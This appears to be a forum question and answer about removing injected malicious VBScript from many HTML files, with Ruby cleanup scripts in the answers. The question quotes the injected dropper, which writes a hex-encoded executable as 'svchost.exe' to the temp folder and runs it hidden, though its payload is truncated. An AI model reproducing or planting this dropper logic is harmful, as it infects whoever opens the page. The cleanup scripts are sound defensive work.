I have a few HTML files on my computer that I borrowed from a friend. Unfortunately, all the files are infected: they all have malicious VBScript code inserted into the source. I have 100s of files and can't edit the source for all of them. Is there a way I can remove the malicious script and still get the data?
Edit: Here is a sample of the code:

    <script language="VBScript"><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A9000030000000400........................8CB03FA48CB03"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
        Set FileObj = FSO.CreateTextFile(DropPath, True)
        For i = 1 To Len(WriteData) Step 2
            FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
        Next
        FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>

Is it safe to upload it online?
There is a lot of antivirus software that'll detect this virus and remove the infected HTML files.
You can run the following Ruby script, which will detect that bad VBScript tag and remove it.

    class VirusKiller
      # Matches any VBScript <script> block: case-insensitive, optional quotes
      # around the language value, non-greedy so only the block itself is removed.
      VIRUS_REG = /<script\s+language\s*=\s*["']?VBScript["']?\s*>.*?<\/script>/im

      def fix_html_virus(file)
        return if File.extname(file) != '.html'
        # Read and write raw bytes so files in unknown encodings are not mangled.
        file_content = File.binread(file)
        clean_content = file_content.gsub(VIRUS_REG, '')
        File.binwrite(file, clean_content)
      end

      # Recursively visit every file below base.
      def transverse_files(base)
        Dir.foreach(base) do |file|
          begin
            next if file == '.' or file == '..'
            path = File.join(base, file)
            if File.file?(path)
              fix_html_virus path
            else
              transverse_files(path)
            end
          rescue StandardError => e
            puts e.message
          end
        end
      end

      def run(root_path)
        transverse_files root_path
      end
    end

    VirusKiller.new.run ARGV[0]

Install Ruby and copy this script into a file (let's say virus_killer.rb). Browse to the location of this file in cmd (if you are on Windows) and run this command:

    ruby virus_killer.rb /path/to/infected_folder/
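
A more conservative variant of the cleanup above, as an added example that is not part of the original answer: it removes only VBScript blocks that contain the markers visible in the question's sample, reports matches without changing anything unless asked, and keeps a .bak copy of every file it rewrites. The names `strip_dropper`, `clean_tree` and the `--apply` switch are assumptions made for this example.

```ruby
require 'fileutils'

# Markers copied from the sample in the question; a block must contain all three.
DROPPER_MARKERS = [/WriteData\s*=/i, /Scripting\.FileSystemObject/i, /WScript\.Shell/i].freeze
# A <script> element whose opening tag declares VBScript, quoted or not, any case.
VBSCRIPT_BLOCK = /<script\b[^>]*\blanguage\s*=\s*["']?vbscript["']?[^>]*>.*?<\/script\s*>/im

# Returns [cleaned_html, removed_count]. VBScript blocks without the markers are kept.
def strip_dropper(html)
  removed = 0
  cleaned = html.gsub(VBSCRIPT_BLOCK) do |block|
    next block unless DROPPER_MARKERS.all? { |marker| block.match?(marker) }
    removed += 1
    ''
  end
  [cleaned, removed]
end

# Walks root recursively. Report-only by default; with apply: true each changed
# file is first copied to <name>.bak and then rewritten without the dropper block.
def clean_tree(root, apply: false)
  report = {}
  Dir.glob('**/*', base: root).each do |rel|
    path = File.join(root, rel)
    next unless File.file?(path) && %w[.html .htm].include?(File.extname(path).downcase)
    cleaned, removed = strip_dropper(File.binread(path)) # raw bytes, any encoding
    next if removed.zero?
    report[path] = removed
    next unless apply
    FileUtils.cp(path, "#{path}.bak")
    File.binwrite(path, cleaned)
  end
  report
end

# Command-line use (assumed interface): ruby script.rb DIR [--apply]
if __FILE__ == $PROGRAM_NAME && ARGV[0]
  clean_tree(ARGV[0], apply: ARGV.include?('--apply')).each do |path, count|
    puts "#{path}: #{count} dropper block(s)"
  end
end
```

Run it once without `--apply` to review the list of affected files, then again with `--apply`; the dropped `svchost.exe` in the temp folder is outside what this script handles.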